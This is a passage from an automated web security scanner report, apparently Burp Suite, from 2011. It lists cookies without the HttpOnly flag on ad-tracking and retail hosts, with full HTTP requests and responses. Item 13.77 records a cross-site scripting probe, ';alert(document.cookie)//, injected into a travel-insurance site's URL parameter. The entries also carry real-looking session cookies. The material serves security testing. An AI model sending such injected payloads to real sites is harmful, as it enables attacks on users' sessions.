GIF89a.............!.......,...........D..;

13.67. http://adserver.veruta.com/track.fcgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /track.fcgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979325968%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758514%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510850857&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ueid=1461734246|1305465412|8|2; cmid=20772879917

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:54:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Set-cookie: ueid=1461734246|1305465412|8|2; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Set-cookie: cmid=20772879917; expires=Tue, 15-May-2012 01:54:22 GMT; path=/; domain=.veruta.com;
Content-Length: 65

<html><head><title></title></head><body><div></div></body></html>

13.68. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:23 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 01:55:23 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.69. http://bluefly.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bluefly.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: bluefly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 02:01:11 GMT
Set-Cookie: SSLB=1; path=/; domain=.bluefly.com
Set-Cookie: SSID=AwDT8CkAAAAAZ4XQTYA_BAFnhdBNAQBnhdBNAAAAAAAAAABnhdBNAQA6AAAAWwQAAAI; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Set-Cookie: SSSC=1.G5607128213521448832.1.58.1115; path=/; domain=.bluefly.com
Set-Cookie: SSRT=Z4XQTQA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Set-Cookie: SSOD=AGHw_gAA; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:11 GMT
Location: http://www.bluefly.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Fri, 01 Oct 2010 19:42:13 GMT
Pragma: no-cache
Set-Cookie: TLTHID=5F2780327F60107F2440D794D8E577B2; Path=/
Set-Cookie: TLTSID=5F2780327F60107F2440D794D8E577B2; Path=/
RTSS: 1
Set-Cookie: TS18d374=7eefd9573d4868f4ad4e68b90b7bd65479d0598447a021b64dd08567; Path=/
Content-Length: 231

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.bluefly.com/
...[SNIP]...

13.70. http://cdn.media.bluefly.com/media/templates/images/topnav/bluefly_blue_navi_logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.media.bluefly.com
Path:   /media/templates/images/topnav/bluefly_blue_navi_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/topnav/bluefly_blue_navi_logo.gif HTTP/1.1
Host: cdn.media.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Wed, 19 Aug 2009 15:02:34 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "5fe2-8fc-4717fecc59680"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:20 GMT
Server: Apache
ETag: "5fe2-8fc-4717fecc59680"
Expires: Mon, 16 May 2011 10:29:20 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A935623E7FA6107F30EEA0CB0E3247A1; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.71. http://cdn.www.bluefly.com/media/css/custom-theme/bluefly_jqui.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/css/custom-theme/bluefly_jqui.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/custom-theme/bluefly_jqui.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Mar 2009 19:55:01 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "41b0-6881-46555f1406f40"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:17 GMT
Server: Apache
ETag: "41b0-6881-46555f1406f40"
Expires: Mon, 16 May 2011 10:29:17 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7EF03BC7FA6107F316B91C463EC5928; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.72. http://cdn.www.bluefly.com/media/css/mybluefly.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/css/mybluefly.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/css/mybluefly.css HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Tue, 09 Nov 2010 23:11:12 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "771a-ba4f-494a6db536400"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A5D332927FA6107F321CBBFE605BF4CE

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:18 GMT
Server: Apache
ETag: "771a-ba4f-494a6db536400"
Expires: Mon, 16 May 2011 10:29:18 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
X-Cache: MISS from cdce-nym011-013.nym011.internap.com
Via: 1.1 cdce-nym011-013.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.73. http://cdn.www.bluefly.com/media/templates/images/myaccount/login-submit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/login-submit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/login-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3839-bba-450e97f3abac0"
If-Modified-Since: Mon, 30 Jun 2008 22:08:19 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3839-bba-450e97f3abac0"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF6BF247FA6107F3291AC8BAB1516C6; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-011.nym011.internap.com
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
Via: 1.1 cdce-nym011-011.nym011.internap.com:1080 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.74. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-create-account.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/subh-create-account.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-create-account.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "382a-309-47bcf0a69df80"
If-Modified-Since: Mon, 28 Dec 2009 19:37:50 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "382a-309-47bcf0a69df80"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEF637347FA6107F30AC9DF5B1018F77; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
Via: 1.1 cdce-nym011-019.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-018.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.75. http://cdn.www.bluefly.com/media/templates/images/myaccount/subh-returning-customers.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/subh-returning-customers.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/subh-returning-customers.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; __utma=9200358.576523501.1305510900.1305510900.1305541459.2; __utmc=9200358; __utmb=9200358.1.10.1305541459; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; SSLB=1; TLTHID=AD5EC21A7FA6107F30C796F19AE9AFF0
If-None-Match: "3843-35a-47adcc546fc00"
If-Modified-Since: Wed, 16 Dec 2009 18:35:28 GMT

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:29 GMT
Server: Apache
ETag: "3843-35a-47adcc546fc00"
Expires: Mon, 16 May 2011 10:29:29 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=AEEAE4E27FA6107F31AAFDF870B371A3; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-018.nym011.internap.com
X-Cache: MISS from cdce-nym011-019.nym011.internap.com
Via: 1.1 cdce-nym011-018.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-019.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.76. http://cdn.www.bluefly.com/media/templates/images/myaccount/submit-submit.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.www.bluefly.com
Path:   /media/templates/images/myaccount/submit-submit.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/templates/images/myaccount/submit-submit.gif HTTP/1.1
Host: cdn.www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/forgot_password.jsp
Cache-Control: max-age=0
If-Modified-Since: Mon, 30 Jun 2008 22:08:22 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "384b-c0e-450e97f688180"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=7D2A76E47F5F107F24CCB1BBDF37F7B5; __utmz=9200358.1305510900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9200358.576523501.1305510900.1305510900.1305510900.1; __utmc=9200358; bn_u=6923549130717770549; bn_cd=d%26g%26s%26r%3D0.1; bnTrail=%5B%22http%3A%2F%2Fwww.bluefly.com%2F%22%2C%22http%3A%2F%2Fwww.bluefly.com%2Fmyfly%2Flogin.jsp%3Bjsessionid%3DONzgfawlrUIPLStla7ZseA**.bluefly_node4%22%5D; SSLB=1; SSID=AwCU-CkAAAAA6YPQTRybEAHpg9BNAgAAAAAAAAAAAAAAAABO-9BNAAAAAAAAAAAAAAA; SSSC=1.G5607126572844751644.2.0.0; SSRT=TvvQTQE; TLTHID=A7FAD6BA7FA6107F3120DAB2BEB63E44

Response

HTTP/1.0 304 Not Modified
Date: Mon, 16 May 2011 10:24:19 GMT
Server: Apache
ETag: "384b-c0e-450e97f688180"
Expires: Mon, 16 May 2011 10:29:19 GMT
Cache-Control: max-age=300
Vary: Accept-Encoding
Set-Cookie: TLTHID=A918C73C7FA6107F31F3FF7AB403FF9F; Path=/; Domain=.bluefly.com
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 cdce-nym011-015.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive


13.77. http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258?AQB=1&ndh=1&t=16/4/2011%206%3A11%3A20%201%20300&ce=iso-8859-1&ns=cebwa&cdp=2&pageName=undefined%3A/TGI2/proc/stateselector.aspx&g=http%3A//buy.travelguard.com/TGI2/proc/stateselector.aspx%3Fpcode%3DMYTG%26br%3Dtgdirect9c35a%2527%253balert%28document.cookie%29//bd29db8f83c%26intcmp%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%26arc%3D000329&r=http%3A//burp/show/20&cc=USD&ch=undefined%3A&h1=D%3Dc8&c2=undefined%3A/TGI2/proc/&c3=undefined%3A/TGI2/proc/&c4=CEBWA%3A1.3&c8=insurance%20services%3Aamericas%3Aunited%20states%3Acommercial%20insurance%3Aaig%20travel%20guard-us&v17=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&v18=D%3DpageName&c19=anon&v19=anon&c20=anon%3Aundefined%3A/TGI2/proc/stateselector.aspx&c21=000329&v21=000329&c22=6%3A00AM&v22=D%3Dc22&c23=Monday&v23=D%3Dc23&c29=001&v29=001&c30=north%20america&v30=D%3Dc30&c32=tgdirect9c35a%27%3Balert%28document.cookie%29//bd29db8f83c&v32=D%3Dc32&c33=english&v33=D%3Dc33&c41=Live&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: cebwa.122.2o7.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(document.cookie)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DCBEC0F[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 11:11:22 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8832D051D05E2-6000010660010273[CE]; Expires=Sat, 14 May 2016 11:11:22 GMT; Domain=cebwa.122.2o7.net; Path=/
Location: http://cebwa.122.2o7.net/b/ss/cebwa001,cebwaglobalchartis/1/H.20.3/s35820650003258?AQB=1&pccr=true&vidn=26E8832D051D05E2-6000010660010273&&ndh=1&t=16/4/2011%206%3A11%3A20%201%20300&ce=iso-8859-1&ns=cebwa&cdp=2&pageName=undefined%3A/TGI2/proc/stateselector.aspx&g=http%3A//buy.travelguard.com/TGI2/proc/stateselector.aspx%3Fpcode%3DMYTG%26br%3Dtgdirect9c35a%2527%253balert%28document.cookie%29//bd29db8f83c%26intcmp%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%26arc%3D000329&r=http%3A//burp/show/20&cc=USD&ch=undefined%3A&h1=D%3Dc8&c2=undefined%3A/TGI2/proc/&c3=undefined%3A/TGI2/proc/&c4=CEBWA%3A1.3&c8=insurance%20services%3Aamericas%3Aunited%20states%3Acommercial%20insurance%3Aaig%20travel%20guard-us&v17=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&v18=D%3DpageName&c19=anon&v19=anon&c20=anon%3Aundefined%3A/TGI2/proc/stateselector.aspx&c21=000329&v21=000329&c22=6%3A00AM&v22=D%3Dc22&c23=Monday&v23=D%3Dc23&c29=001&v29=001&c30=north%20america&v30=D%3Dc30&c32=tgdirect9c35a%27%3Balert%28document.cookie%29//bd29db8f83c&v32=D%3Dc32&c33=english&v33=D%3Dc33&c41=Live&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 11:11:22 GMT
Last-Modified: Tue, 17 May 2011 11:11:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
